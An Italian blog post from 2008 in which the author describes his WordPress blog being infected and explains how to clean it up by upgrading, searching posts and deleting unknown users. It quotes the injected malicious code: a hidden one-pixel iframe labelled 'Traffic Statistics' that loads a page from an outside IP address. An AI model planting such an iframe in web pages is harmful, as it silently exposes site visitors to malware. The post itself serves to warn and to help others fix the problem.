Home Page

25 Luglio 2008

Il mio Wordpress col malware

Purtroppo è accaduto. Accidenti!
Ho aspettato troppo a fare l’upgrade a Worpress 2.6 e il mio blog è stato infettato.

Sì, proprio così… mi sono ritrovato il seguente codice o qualcosa di simile in mezzo al codice di alcuni post… a mia insaputa.

<!-- Traffic Statistics -->
<iframe src=http://61.132.xx.xx/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
<!-- End Traffic Statistics -->

Ho fatto una ricerca in giro e sembra proprio che sia una vulnerabilità delle versioni di Wordpress precedenti la 2.3.3: leggete qui.

La soluzione?
Ce ne sono un paio:

  1. Sicuramente la migliore è fare un bell’upgrade come ho fatto anche io. Ci vuole relativamente poco: si fa una copia di backup del DB mySQL e dei file del vecchio blog, si fa l’upload della nuova versione di WP sul server mantenendo il vecchio wp-config.php e la cartella wp-content/uploads/ poi accedete al pannello di controllo e seguite le istruzioni
  2. In alternativa andare nel pannello di controllo > gestione > e fare una ricerca del testo incriminato all’interno dei post per rimuoverlo… ma non finisce qui. Potrebbero essere stati creati degli utenti a vostra insaputa: cancellateli!

Brutta esperienza… non lo auguro a nessuno… e le sorprese non sono finite qua! :-(
Al prossimo post per conoscere il vero lato oscuro di tutto ciò. Sigh!

Pubblicato in Blog, Wordpress

Leave a Reply

Informazioni su questo blog Informazioni su questo blog

TROVA:

Abbonati ai Feed RSS di questo Blog Abbonati ai Feed RSS di questo Blog Scarica lo screen saver di shines Scarica lo screen saver di shines